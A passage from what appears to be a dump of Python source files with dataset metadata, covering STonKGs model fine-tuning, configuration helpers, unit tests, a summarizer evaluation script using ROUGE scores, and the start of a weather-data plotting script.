= StratifiedShuffleSplit(\n n_splits=1,\n train_size=max_dataset_size,\n random_state=random_seed,\n )\n for train_index, _ in splitter.split(data, labels):\n data = data.iloc[train_index, :].reset_index(drop=True)\n labels = labels.iloc[train_index].reset_index(drop=True)\n\n # Generate the actual train/test splits here:\n # Implement non-stratified train/test splits\n skf = KFold(n_splits=5 if n_splits == 1 else n_splits, random_state=random_seed, shuffle=True)\n result_indices = [\n {\"train_idx\": train_idx, \"test_idx\": test_idx}\n for train_idx, test_idx in skf.split(data, labels)\n ]\n\n if n_splits == 1:\n return [result_indices[0]]\n else:\n return result_indices\n\n\ndef preprocess_fine_tuning_data(\n train_data_path: str,\n class_column_name: str = \"class\",\n embedding_name_to_vector_path: str = EMBEDDINGS_PATH,\n embedding_name_to_random_walk_path: str = RANDOM_WALKS_PATH,\n nlp_model_type: str = NLP_MODEL_TYPE,\n sep_id: int = 102,\n unk_id: int = 100,\n) -> pd.DataFrame:\n \"\"\"Generate input_ids, attention_mask, token_type_ids etc. based on the source, target, evidence columns.\"\"\"\n # Load the KG embedding dict to convert the names to numeric indices\n kg_embed_dict = prepare_df(embedding_name_to_vector_path)\n kg_name_to_idx = {key: i for i, key in enumerate(kg_embed_dict.keys())}\n # Load the random walks for each node\n random_walk_dict = prepare_df(embedding_name_to_random_walk_path)\n # Convert random walk sequences to list of numeric indices\n random_walk_idx_dict = {\n k: [kg_name_to_idx[node] for node in v] for k, v in random_walk_dict.items()\n }\n\n # Load the raw fine-tuning dataset with source, target and evidence\n unprocessed_df = pd.read_csv(\n train_data_path, sep=\"\\t\", usecols=[\"source\", \"target\", \"evidence\", class_column_name]\n )\n\n # TODO: leave it out later on?\n # Filter out any triples that contain a node that is not in the embeddings_dict\n original_length = len(unprocessed_df)\n unprocessed_df = unprocessed_df[\n unprocessed_df[\"source\"].isin(kg_embed_dict.keys())\n & unprocessed_df[\"target\"].isin(kg_embed_dict.keys())\n ].reset_index(drop=True)\n new_length = len(unprocessed_df)\n logger.info(\n f\"{original_length - new_length} out of {original_length} triples are left out because they contain \"\n f\"nodes which are not present in the pre-training data\"\n )\n\n # Check how many nodes in the fine-tuning dataset are not covered by the learned KG embeddings\n number_of_pre_training_nodes = len(\n set(unprocessed_df[\"source\"]).union(set(unprocessed_df[\"target\"]))\n )\n if number_of_pre_training_nodes > len(kg_embed_dict):\n logger.warning(\n f\"{number_of_pre_training_nodes - len(kg_embed_dict)} out of {number_of_pre_training_nodes}\"\n f\"nodes are not covered by the embeddings learned in the pretraining dataset\"\n )\n\n # Get the length of the text or entity embedding sequences (2 random walks + 2 = entity embedding sequence length)\n random_walk_length = len(next(iter(random_walk_idx_dict.values())))\n half_length = random_walk_length * 2 + 2\n\n # Initialize a FAST tokenizer if it's the default one (BioBERT)\n if nlp_model_type == NLP_MODEL_TYPE:\n # Initialize the fast tokenizer for getting the text token ids\n tokenizer = BertTokenizerFast(vocab_file=VOCAB_FILE)\n else:\n # Initialize a slow tokenizer used for getting the text token ids\n tokenizer = BertTokenizer.from_pretrained(nlp_model_type)\n\n # Initialize the preprocessed data\n fine_tuning_preprocessed = []\n\n # Log progress with a progress bar\n for _, row in tqdm(\n unprocessed_df.iterrows(),\n total=unprocessed_df.shape[0],\n desc=\"Preprocessing the fine-tuning dataset\",\n ):\n # 1. \"Token type IDs\": 0 for text tokens, 1 for entity tokens\n token_type_ids = [0] * half_length + [1] * half_length\n\n # 2. Tokenization for getting the input ids and attention masks for the text\n # Use encode_plus to also get the attention mask (\"padding\" mask)\n encoded_text = tokenizer.encode_plus(\n row[\"evidence\"],\n padding=\"max_length\",\n truncation=True,\n max_length=half_length,\n )\n text_token_ids = encoded_text[\"input_ids\"]\n text_attention_mask = encoded_text[\"attention_mask\"]\n\n # 3. Get the random walks sequence and the node indices, add the SEP (usually with id=102) in between\n # Use a sequence of UNK tokens if the node is not contained in the dictionary of the nodes from pre-training\n random_w_source = (\n random_walk_idx_dict[row[\"source\"]]\n if row[\"source\"] in random_walk_idx_dict.keys()\n else [unk_id] * random_walk_length\n )\n random_w_target = (\n random_walk_idx_dict[row[\"target\"]]\n if row[\"target\"] in random_walk_idx_dict.keys()\n else [unk_id] * random_walk_length\n )\n random_w_ids = random_w_source + [sep_id] + random_w_target + [sep_id]\n\n # 4. Total attention mask (attention mask is all 1 for the entity sequence)\n attention_mask = text_attention_mask + [1] * half_length\n\n # 5. Total input_ids = half text ids + half entity ids\n input_ids = text_token_ids + random_w_ids\n\n # Add all the features to the preprocessed data\n fine_tuning_preprocessed.append(\n {\n \"input_ids\": input_ids,\n \"attention_mask\": attention_mask,\n \"token_type_ids\": token_type_ids, # Remove the MLM, ELM and NSP labels since it's not needed anymore\n \"labels\": row[\n class_column_name\n ], # Add the annotation/relation label for fine-tuning instead\n }\n )\n\n # Put the preprocessed data into a dataframe\n fine_tuning_preprocessed_df = pd.DataFrame(fine_tuning_preprocessed)\n\n return fine_tuning_preprocessed_df\n\n\nclass INDRADataset(torch.utils.data.Dataset):\n \"\"\"Custom Dataset class for INDRA data containing the combination of text and KG triple data.\"\"\"\n\n def __init__(\n self,\n encodings,\n labels,\n ):\n \"\"\"Initialize INDRA Dataset based on the combined input sequence consisting of text and triple data.\"\"\"\n self.encodings = encodings\n # Assumes that the labels are numerically encoded\n self.labels = labels\n\n def __getitem__(self, idx):\n \"\"\"Return data entries for given indices.\"\"\"\n item = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}\n item[\"labels\"] = torch.tensor(self.labels[idx])\n return item\n\n def __len__(self):\n \"\"\"Return the length of the dataset.\"\"\"\n return len(self.labels)\n\n\nclass STonKGsForSequenceClassification(STonKGsForPreTraining):\n \"\"\"Create the fine-tuning part of the STonKGs model based the pre-trained STonKGs model.\n\n Note that this class inherits from STonKGsForPreTraining rather than PreTrainedModel, thereby it's deviating from\n the typical huggingface inheritance logic of the fine-tuning classes.\n \"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Initialize the STonKGs sequence classification model based on the pre-trained STonKGs model architecture.\"\"\"\n super().__init__(config, **kwargs)\n self.num_labels = config.num_labels\n self.config = config\n\n # Load the pretrained STonKGs Transformer here\n self.bert = BertModel(config)\n self.dropout = torch.nn.Dropout(config.hidden_dropout_prob)\n self.classifier = torch.nn.Linear(config.hidden_size, config.num_labels)\n\n # Initialize all the pre-trained as well as new weights (i.e. classifier weights) here\n self.init_weights()\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n token_type_ids=None,\n position_ids=None,\n head_mask=None,\n inputs_embeds=None,\n labels=None,\n output_attentions=None,\n output_hidden_states=None,\n return_dict=None,\n ):\n \"\"\"Perform one forward pass for a given sequence of text_input_ids + ent_input_ids.\"\"\"\n # TODO documentation for each parameter\n # TODO type annotations for each parameter\n # Use the LM backbone to get the pre-trained token embeddings\n # batch x half_length x hidden_size\n # The first element of the returned tuple from the LM backbone forward() pass is the sequence of hidden states\n token_embeddings = self.lm_backbone(input_ids[:, : self.cls.predictions.half_length])[0]\n\n # Use the KG backbone to obtain the pre-trained entity embeddings\n # batch x half_length x hidden_size\n ent_embeddings = torch.stack(\n [\n # for each numeric index in the random walks sequence: get the embedding vector from the KG backbone\n torch.stack([self.kg_backbone[i.item()] for i in j])\n # for each example in the batch: get the random walks sequence\n for j in input_ids[:, self.cls.predictions.half_length :]\n ],\n )\n\n # Concatenate token and entity embeddings obtained from the LM and KG backbones and cast to float\n # batch x seq_len x hidden_size\n inputs_embeds = (\n torch.cat(\n [token_embeddings, ent_embeddings.to(token_embeddings.device)],\n dim=1,\n )\n .type(torch.FloatTensor)\n .to(self.device)\n )\n\n # Get the hidden states from the pretrained STonKGs Transformer layers\n outputs = self.bert(\n inputs_embeds=inputs_embeds,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n head_mask=head_mask,\n return_dict=None,\n )\n # Only use the pooled output (of the [CLS] token)\n pooled_output = outputs[1]\n\n # Apply dropout and the linear layer\n pooled_output = self.dropout(pooled_output)\n logits = self.classifier(pooled_output)\n\n loss = None\n if labels is not None:\n if self.config.problem_type is None:\n if self.num_labels == 1:\n self.config.problem_type = \"regression\"\n elif self.num_labels > 1 and (\n labels.dtype == torch.long or labels.dtype == torch.int\n ):\n self.config.problem_type = \"single_label_classification\"\n else:\n self.config.problem_type = \"multi_label_classification\"\n\n if self.config.problem_type == \"regression\":\n loss_fct = torch.nn.MSELoss()\n loss = loss_fct(logits.view(-1, self.num_labels), labels)\n elif self.config.problem_type == \"single_label_classification\":\n loss_fct = torch.nn.CrossEntropyLoss()\n loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))\n elif self.config.problem_type == \"multi_label_classification\":\n loss_fct = torch.nn.BCEWithLogitsLoss()\n loss = loss_fct(logits, labels)\n if not return_dict:\n output = (logits,) + outputs[2:]\n return ((loss,) + output) if loss is not None else output\n\n return SequenceClassifierOutput(\n loss=loss,\n logits=logits,\n hidden_states=outputs.hidden_states,\n attentions=outputs.attentions,\n )\n\n\ndef run_sequence_classification_cv(\n train_data_path: str,\n model_path: str = PRETRAINED_STONKGS_PATH,\n output_dir: Optional[str] = STONKGS_OUTPUT_DIR,\n logging_uri_mlflow: Optional[str] = MLFLOW_FINETUNING_TRACKING_URI,\n label_column_name: str = \"labels\",\n class_column_name: str = \"class\",\n epochs: Optional[int] = 10,\n log_steps: int = 500,\n lr: float = 5e-5,\n batch_size: int = 8,\n gradient_accumulation: int = 1,\n task_name: str = \"\",\n deepspeed: bool = True,\n max_dataset_size: int = 100000,\n cv: int = 5,\n) -> Dict:\n \"\"\"Run cross-validation for the sequence classification task(s) using STonKGs.\"\"\"\n # Get data splits\n fine_tuning_df = preprocess_fine_tuning_data(\n train_data_path=train_data_path,\n class_column_name=class_column_name,\n )\n\n train_test_splits = get_train_test_splits(\n fine_tuning_df,\n max_dataset_size=max_dataset_size,\n n_splits=cv,\n )\n\n # Get text evidences and labels\n fine_tuning_data, labels_str = (\n fine_tuning_df.drop(columns=label_column_name),\n fine_tuning_df[label_column_name],\n )\n # Numerically encode labels\n unique_tags = set(label for label in labels_str)\n tag2id = {label: number for number, label in enumerate(unique_tags)}\n id2tag = {value: key for key, value in tag2id.items()}\n labels = pd.Series([int(tag2id[label]) for label in labels_str])\n\n # Initialize the f1-score\n f1_scores = []\n\n # End previous run\n mlflow.end_run()\n # Initialize mlflow run, set tracking URI to use the same experiment for all runs,\n # so that one can compare them\n mlflow.set_tracking_uri(logging_uri_mlflow)\n mlflow.set_experiment(\"STonKGs Fine-Tuning\")\n\n # Initialize a dataframe for all the predicted labels\n result_df = pd.DataFrame()\n\n for idx, indices in enumerate(train_test_splits):\n model = STonKGsForSequenceClassification.from_pretrained(\n pretrained_model_name_or_path=model_path,\n num_labels=len(unique_tags),\n )\n\n # Based on the preprocessed fine-tuning dataframe: Convert the data into the desired dictionary format\n # for the INDRADataset\n train_data = (\n fine_tuning_data.iloc[indices[\"train_idx\"]]\n .reset_index(drop=True)\n .to_dict(orient=\"list\")\n )\n test_data = (\n fine_tuning_data.iloc[indices[\"test_idx\"]].reset_index(drop=True).to_dict(orient=\"list\")\n )\n train_labels = labels[indices[\"train_idx\"]].tolist()\n test_labels = labels[indices[\"test_idx\"]].tolist()\n train_dataset = INDRADataset(encodings=train_data, labels=train_labels)\n test_dataset = INDRADataset(encodings=test_data, labels=test_labels)\n\n # Note that due to the randomization in the batches, the training/evaluation is slightly\n # different every time\n # TrainingArgument uses a default batch size of 8\n training_args = TrainingArguments(\n output_dir=output_dir,\n num_train_epochs=epochs, # total number of training epochs\n logging_steps=log_steps, # reduce the number of logging steps to avoid collisions when writing to the\n # shared database\n # Use deepspeed with a specified config file for speedup\n deepspeed=DEEPSPEED_CONFIG_PATH if deepspeed else None,\n learning_rate=lr,\n report_to=[\"mlflow\"], # log via mlflow\n do_train=True,\n do_predict=True,\n per_device_train_batch_size=batch_size,\n per_device_eval_batch_size=batch_size,\n gradient_accumulation_steps=gradient_accumulation,\n )\n\n # Initialize Trainer based on the training dataset\n trainer = Trainer(\n model=model,\n args=training_args,\n train_dataset=train_dataset,\n )\n # Train\n trainer.train()\n\n # Log some details about the datasets used in training and testing\n mlflow.log_param(\"label dict\", str(tag2id))\n mlflow.log_param(\"training dataset size\", str(len(train_labels)))\n mlflow.log_param(\"training class dist\", str(Counter(train_labels)))\n mlflow.log_param(\"test dataset size\", str(len(test_labels)))\n mlflow.log_param(\"test class dist\", str(Counter(test_labels)))\n\n # Make predictions for the test dataset\n predictions = trainer.predict(test_dataset=test_dataset).predictions\n predicted_labels = np.argmax(predictions, axis=1)\n logger.info(f\"Predicted labels: {predicted_labels}\")\n\n # Save the predicted + true labels\n partial_result_df = pd.DataFrame(\n {\n \"split\": idx,\n \"index\": indices[\"test_idx\"].tolist(),\n \"predicted_label\": predicted_labels.tolist(),\n \"true_label\": test_labels,\n \"evidence\": fine_tuning_data.iloc[indices[\"test_idx\"]][\"input_ids\"].tolist(),\n },\n )\n result_df = result_df.append(\n partial_result_df,\n ignore_index=True,\n )\n\n # Use weighted average\n f1_sc = f1_score(test_labels, predicted_labels, average=\"weighted\")\n f1_scores.append(f1_sc)\n\n # Log the final f1_score\n mlflow.log_metric(\"f1_score_weighted\", f1_sc)\n\n # Log mean and std f1-scores from the cross validation procedure (average and std across all splits) to the\n # standard logger\n logger.info(f\"Mean f1-score: {np.mean(f1_scores)}\")\n logger.info(f\"Std f1-score: {np.std(f1_scores)}\")\n\n # Map the labels in the result df back to their original names\n result_df = result_df.replace({\"predicted_label\": id2tag, \"true_label\": id2tag})\n # Save the result_df\n result_df.to_csv(\n os.path.join(STONKGS_OUTPUT_DIR, \"predicted_labels_stonkgs_\" + task_name + \"df.tsv\"),\n index=False,\n sep=\"\\t\",\n )\n\n # Save the last model\n trainer.save_model(output_dir=os.path.join(STONKGS_OUTPUT_DIR, task_name))\n\n # End the previous run\n mlflow.end_run()\n\n # Log the mean and std f1 score from the cross validation procedure to mlflow\n with mlflow.start_run():\n # Log the task name as well\n mlflow.log_param(\"task name\", task_name)\n mlflow.log_metric(\"f1_score_mean\", np.mean(f1_scores))\n mlflow.log_metric(\"f1_score_std\", np.std(f1_scores))\n\n return {\"f1_score_mean\": np.mean(f1_scores), \"f1_score_std\": np.std(f1_scores)}\n\n\n@click.command()\n@click.option(\"-e\", \"--epochs\", default=5, help=\"Number of epochs\", type=int)\n@click.option(\n \"--cv\", default=5, help=\"Number of cross validation splits (use 1 to omit cv)\", type=int\n)\n@click.option(\"--lr\", default=5e-5, help=\"Learning rate\", type=float)\n@click.option(\n \"--logging_dir\",\n default=MLFLOW_FINETUNING_TRACKING_URI,\n help=\"Mlflow logging/tracking URI\",\n type=str,\n)\n@click.option(\"--log_steps\", default=500, help=\"Number of steps between each log\", type=int)\n@click.option(\n \"--model_path\",\n default=PRETRAINED_STONKGS_PATH,\n help=\"Path of the pretrained model\",\n type=str,\n)\n@click.option(\"--output_dir\", default=STONKGS_OUTPUT_DIR, help=\"Output directory\", type=str)\n@click.option(\"--batch_size\", default=8, help=\"Batch size used in fine-tuning\", type=int)\n@click.option(\n \"--gradient_accumulation_steps\", default=1, help=\"Gradient accumulation steps\", type=int\n)\n@click.option(\"--deepspeed\", default=True, help=\"Whether to use deepspeed or not\", type=bool)\n@click.option(\n \"--max_dataset_size\",\n default=100000,\n help=\"Maximum dataset size of the fine-tuning datasets\",\n type=int,\n)\n@click.option(\"--local_rank\", default=-1, help=\"THIS PARAMETER IS IGNORED\", type=int)\ndef run_all_fine_tuning_tasks(\n epochs: int = 5,\n cv: int = 5,\n log_steps: int = 500,\n lr: float = 5e-5,\n model_path: str = PRETRAINED_STONKGS_PATH,\n output_dir: str = STONKGS_OUTPUT_DIR,\n logging_dir: Optional[str] = MLFLOW_FINETUNING_TRACKING_URI,\n batch_size: int = 8,\n gradient_accumulation_steps: int = 1,\n deepspeed: bool = True,\n max_dataset_size: int = 100000, # effectively removes the max dataset size restriction\n local_rank: int = -1,\n):\n \"\"\"Run all fine-tuning tasks at once.\"\"\"\n # Specify all directories and file names\n directories = [\n CELL_LINE_DIR,\n CELL_TYPE_DIR,\n CORRECT_DIR,\n CORRECT_DIR,\n DISEASE_DIR,\n LOCATION_DIR,\n ORGAN_DIR,\n SPECIES_DIR,\n RELATION_TYPE_DIR,\n RELATION_TYPE_DIR,\n ]\n file_names = [\n \"cell_line_ppi_prot.tsv\",\n \"cell_type_ppi_prot.tsv\",\n \"correct_incorrect_binary_ppi_prot.tsv\",\n \"correct_incorrect_multiclass_ppi_prot.tsv\",\n \"disease_ppi_prot.tsv\",\n \"location_ppi_prot.tsv\",\n \"organ_ppi_prot.tsv\",\n \"species_ppi_prot.tsv\",\n \"relation_type_ppi_prot.tsv\",\n \"relation_type_ppi_prot.tsv\",\n ]\n task_names = [\n \"cell_line\",\n \"cell_type\",\n \"correct_binary\",\n \"correct_multiclass\",\n \"disease\",\n \"location\",\n \"organ\",\n \"species\",\n \"interaction\",\n \"polarity\",\n ]\n # Specify the column names of the target variable\n column_names = [\"class\"] * 8 + [\"interaction\"] + [\"polarity\"]\n\n for directory, file, column_name, task_name in zip(\n directories,\n file_names,\n column_names,\n task_names,\n ):\n # Run the 8 fine-tuning tasks\n run_sequence_classification_cv(\n train_data_path=os.path.join(directory, file),\n model_path=model_path,\n output_dir=output_dir,\n logging_uri_mlflow=logging_dir,\n epochs=epochs,\n log_steps=log_steps,\n lr=lr,\n batch_size=batch_size,\n gradient_accumulation=gradient_accumulation_steps,\n class_column_name=column_name,\n task_name=task_name,\n deepspeed=deepspeed,\n max_dataset_size=max_dataset_size,\n cv=cv,\n )\n logger.info(f\"Finished the {task_name} task\")\n\n\nif __name__ == \"__main__\":\n # Set the huggingface environment variable for tokenizer parallelism to false\n os.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\n # Run all CV fine-tuning tasks\n run_all_fine_tuning_tasks()\n","sub_path":"src/stonkgs/models/stonkgs_finetuning.py","file_name":"stonkgs_finetuning.py","file_ext":"py","file_size_in_byte":24169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"112989924","text":"#\n# Copyright (c) 2018 ISP RAS (http://www.ispras.ru)\n# Ivannikov Institute for System Programming of the Russian Academy of Sciences\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport json\n\n\ndef get_conf_property(conf, name, expected_type=None):\n \"\"\"\n Check that configuration properties dictionary contains the given configuration property and return its value.\n\n :param conf: Dictionary.\n :param name: Configuration property string.\n :param expected_type: Check that given value has an expected type.\n :return: Configuration property value.\n \"\"\"\n if name in conf:\n if expected_type and not isinstance(conf[name], expected_type):\n raise TypeError(\"Expect configuration property '{}' to be set with a '{}' value but it has type '{}'\".\n format(name, str(expected_type), str(type(conf[name]))))\n return conf[name]\n else:\n return None\n\n\ndef get_necessary_conf_property(conf, name):\n \"\"\"\n Return configuration property value and expect it to be set.\n\n :param conf: Dictionary.\n :param name: Configuration property string.\n :return: Configuration property value.\n \"\"\"\n check_necessary_conf_property(conf, name, None)\n return conf[name]\n\n\ndef check_or_set_conf_property(conf, name, default_value=None, expected_type=None):\n \"\"\"\n Check that property is set or set its value with a provided value.\n\n :param conf: Dictionary.\n :param name: Configuration property string.\n :param default_value: Default value to be set.\n :param expected_type: Check that given value has an expected type.\n :return: None\n \"\"\"\n if name not in conf:\n conf[name] = default_value\n check_necessary_conf_property(conf, name, expected_type)\n\n\ndef check_necessary_conf_property(conf, name, expected_type=None):\n \"\"\"\n Check that property is set or set its value with a provided value.\n\n :param conf: Dictionary.\n :param name: Configuration property string.\n :param expected_type: Check that given value has an expected type.\n :return: True\n \"\"\"\n if name not in conf:\n raise KeyError(\"Expect configuration property {!r} to be set properly\".format(name))\n elif name in conf and expected_type and not isinstance(conf[name], expected_type):\n raise TypeError(\"Expect configuration property {!r} to be set with a {!r} value but it has type {!r}\".\n format(name, str(expected_type), str(type(conf[name]))))\n return True\n\n\ndef model_comment(comment_type, text, other=None):\n \"\"\"\n Print model comment in the form accepted by the Klever error trace parser from VRP. This simple comment contains\n short json to parse.\n\n For example:\n /* LDV {\"action\": \"REGISTER\", \"type\": \"DISPATCH_BEGIN\", \"comment\": \"Register TTY callbacks.\"} */\n\n :param comment_type: Comment type string.\n :param text: Sentence string with a comment itself.\n :param other: An existing dictionary to which the comment and type should be added\n :return: Final coment string (look at the example above).\n \"\"\"\n if other and isinstance(other, dict):\n comment = other\n else:\n comment = dict()\n\n comment['type'] = comment_type.upper()\n if text:\n comment['comment'] = text\n\n string = json.dumps(comment)\n return \"/* LDV {} */\".format(string)\n","sub_path":"core/core/vtg/emg/common/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"436915052","text":"import unittest\r\nfrom state_count import *\r\nfrom highest_in_state import *\r\nfrom closest_university import *\r\n\r\n\r\nclass TestCSV(unittest.TestCase):\r\n def test(self):\r\n tests = []\r\n tests.append(['AK', 9])\r\n tests.append(['TX', 446])\r\n tests.append(['AL', 94])\r\n tests.append(['OK', 129])\r\n tests.append(['CA', 716])\r\n tests.append(['FL', 412])\r\n tests.append(['NY', 452])\r\n\r\n for test in tests:\r\n exp = test[1]\r\n act = state_count(test[0])\r\n self.assertEqual(\r\n exp, act, \"state_count('\" + test[0] + \"') incorrect\")\r\n\r\n def test_highest_in_state(self):\r\n tests = []\r\n tests.append(['AK', 20760, 'Alaska Pacific University'])\r\n tests.append(['TX', 52498, 'Southern Methodist University'])\r\n tests.append(['NJ', 50554, 'Stevens Institute of Technology'])\r\n tests.append(['OR', 54200, 'Reed College'])\r\n tests.append(['NV', 32639, 'Sierra Nevada College'])\r\n\r\n for test in tests:\r\n expValue = test[1]\r\n expName = test[2]\r\n self.assertEqual((expValue, expName), highest_in_state(test[0]))\r\n\r\n def test_closest(self):\r\n tests = []\r\n # Seven Lakes HS\r\n tests.append([(15.885002, 'Fortis College'), (29.707459, -95.8101941)])\r\n\r\n # Statue of Liberty\r\n tests.append([(3.3121172, 'Mildred Elley-New York Campus'),\r\n (40.6892534, -74.0466891)])\r\n\r\n # Golden Gate Bridge\r\n tests.append([(2.233386, 'Presidio Graduate School'),\r\n (37.8199286, -122.4804438)])\r\n\r\n for test in tests:\r\n closest = closest_university(test[1])\r\n self.assertEqual(test[0][1], closest[1])\r\n self.assertAlmostEqual(test[0][0], closest[0], 4)\r\n","sub_path":"test_csv.py","file_name":"test_csv.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"260423362","text":"from pymongo import MongoClient\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nfrom nltk import sent_tokenize, word_tokenize\nfrom Rouge import rouge_score\nfrom summarizer_dev import *\nfrom summarizer import Summarizer\nimport matplotlib.pyplot as plt\nimport seaborn\nimport pickle\n\n\ndef get_summaries_and_articles(coll):\n '''\n INPUT: mongo collection object\n OUTPUT: list of summaries, list of articles\n\n Runs through the MongoDB and extracts all of the newser.com summaries\n with their corresponding articles.\n '''\n\n summary_list = []\n article_list = []\n\n for doc in list(coll.find()):\n if doc['full_text'] != ' ':\n summary_list.append(doc['summary'])\n article_list.append(doc['full_text'])\n\n for i in xrange(len(article_list)):\n text = ''\n for article in article_list[i]:\n text += article\n article_list[i] = text\n\n summary_test = np.unique([summary_list[i] for i in xrange(len(summary_list))\n if article_list[i] != '' and\n article_list[i] != ' ' and\n len(sent_tokenize(article_list[i])) > 10])\n article_test = np.unique([article for article in article_list\n if article != '' and\n article_list[i] != ' ' and\n len(sent_tokenize(article)) > 10])\n\n return summary_test, article_test\n\n\ndef make_article_vectors(article_list, vocab, normalize=False):\n '''\n INPUT: list of articles, vocab dict\n OUTPUT: array of sentences, array of vectors\n\n Don't remember why I did this? Probably before I built the summarizer object.\n '''\n article_vectors = []\n sentence_list = []\n for article in article_list:\n sentences = np.array(sent_tokenize(article))\n sentence_list.append(sentences)\n if normalize:\n counts = CountVectorizer(stop_words='english', vocabulary=vocab, normalize=True)\n else:\n counts = CountVectorizer(stop_words='english', vocabulary=vocab)\n article_count_vector = get_vector(counts, [article])[0]\n article_vectors.append(article_count_vector)\n return np.array(sentence_list), np.array(article_vectors)\n\n\nif __name__ == '__main__':\n mongo_client = MongoClient()\n db = mongo_client.g_project_data\n coll = db.test_data\n\n summary_list, article_list = get_summaries_and_articles(coll)\n\n mongo_client.close()\n\n idf = unpickle('idf')\n vocab = unpickle('vocab')\n\n count = CountVectorizer(vocabulary=vocab, stop_words='english')\n\n summarizer_multi = Summarizer(vocab=vocab, idf=idf, vectorizer=count, scoring='multi_Tfidf')\n summarizer_single = Summarizer(vocab=vocab, idf=idf, vectorizer=count, scoring='single_Tfidf')\n summarizer_sig = Summarizer(vocab=vocab, idf=idf, vectorizer=count, scoring='significance')\n summarizer_sim = Summarizer(vocab=vocab, idf=idf, vectorizer=count, scoring='similarity')\n summarizer_rand = Summarizer(vocab=vocab, idf=idf, vectorizer=count, scoring='random')\n\n multi_r2 = []\n multi_reduction2 = []\n single_r2 = []\n single_reduction2 = []\n sig_r2 = []\n sig_reduction2 = []\n sim_r2 = []\n sim_reduction2 = []\n rand_r2 = []\n rand_reduction2 = []\n for summary, article in zip(summary_list[53:], article_list[53:]):\n summarizer_multi.fit(article)\n summarizer_single.fit(article)\n summarizer_sig.fit(article)\n summarizer_sim.fit(article)\n summarizer_rand.fit(article)\n multi_r2.append(summarizer_multi.rouge(summary))\n single_r2.append(summarizer_single.rouge(summary))\n sig_r2.append(summarizer_sig.rouge(summary))\n sim_r2.append(summarizer_sim.rouge(summary))\n rand_r2.append(summarizer_rand.rouge(summary))\n multi_reduction2.append(summarizer_multi.reduction)\n single_reduction2.append(summarizer_single.reduction)\n sig_reduction2.append(summarizer_sig.reduction)\n sim_reduction2.append(summarizer_sim.reduction)\n rand_reduction2.append(summarizer_rand.reduction)\n\n plt.boxplot([multi_r, single_r, sig_r, sim_r, rand_r])\n plt.ylabel('Rouge Score')\n plt.ylim((0, 0.25))\n plt.plot()\n plt.savefig('../images/boxplot.png')\n\n plt.boxplot([multi_r, sig_r, rand_r])\n plt.ylabel('Rouge Score')\n plt.ylim((0, 0.25))\n plt.plot()\n plt.savefig('../images/boxplot2.png')\n","sub_path":"app/summarizer/test_summarizers.py","file_name":"test_summarizers.py","file_ext":"py","file_size_in_byte":4479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"485970497","text":"from nose2.tools import params\nimport unittest\nfrom test.example_runner import run_docstring_example\nfrom hamcrest import assert_that\nfrom allure_commons_test.report import has_test_case\nfrom allure_commons_test.result import has_parameter\nfrom allure_commons.utils import represent\n\n\n@params(\n ((\"alpha\", \"hello\"), (\"betta\", 42)),\n ((\"alpha\", \"world\"), (\"betta\", 777))\n)\ndef test_parametrized_func(first, second):\n \"\"\"\n >>> from nose2.tools import params\n\n >>> @params((\"hello\", 42), (\"world\", 777))\n ... def test_parametrized_func_example(alpha, betta):\n ... pass\n \"\"\"\n first_param_name, first_param_value = first\n second_param_name, second_param_value = second\n\n allure_report = run_docstring_example()\n assert_that(allure_report,\n has_test_case(\"test_parametrized_func_example\",\n has_parameter(first_param_name, represent(first_param_value)),\n has_parameter(second_param_name, represent(second_param_value))\n )\n )\n\n\nclass TestParametrized(unittest.TestCase):\n\n @params(\n ((\"bravo\", {\"hello\": 4}), (\"charlie\", [4, 2])),\n ((\"bravo\", {\"wold\": 2}), (\"charlie\", [7, 7, 7]))\n )\n def test_parametrized_method(self, first, second):\n \"\"\"\n >>> import unittest\n >>> from nose2.tools import params\n\n >>> class TestParametrizedExample(unittest.TestCase):\n ... @params(({\"hello\": 4}, [4, 2]), ({\"wold\": 2}, [7, 7, 7]))\n ... def test_parametrized_method_example(self, bravo, charlie):\n ... pass\n \"\"\"\n first_param_name, first_param_value = first\n second_param_name, second_param_value = second\n\n allure_report = run_docstring_example()\n assert_that(allure_report,\n has_test_case(\"test_parametrized_method_example\",\n has_parameter(first_param_name, represent(first_param_value)),\n has_parameter(second_param_name, represent(second_param_value))\n )\n )\n","sub_path":"allure-nose2/test/parametrized/test_parametrized.py","file_name":"test_parametrized.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"445455306","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.basemap import Basemap\r\nfrom matplotlib.colors import ListedColormap\r\n\r\n\r\nclass Data(object):\r\n def __init__(self, category):\r\n self.__data = self.getPackage(category)\r\n#return the data as a numpy array so we can use its contents\r\n def getPackage(self, category):\r\n return np.fromfile(category + \"01.bin\", dtype='>f')\r\n\r\n def getIndex(self, x, y, z):\r\n#find the datarecord in the datalist\r\n index = self.__data[x + 500* (y + 500 * z)]\r\n#was given on the website\r\n if index < 1000:\r\n return index\r\n return self.getIndex(x+1, y, z)\r\n\r\n\r\ndef CONTOUR(data, ax):\r\n#find z value according to hight in meters\r\n mincolour = 100000\r\n maxcolour = -100000\r\n\r\n z = 8\r\n matrix = []\r\n\r\n list = range(500)\r\n for x in list:\r\n matrix.append([])\r\n for y in 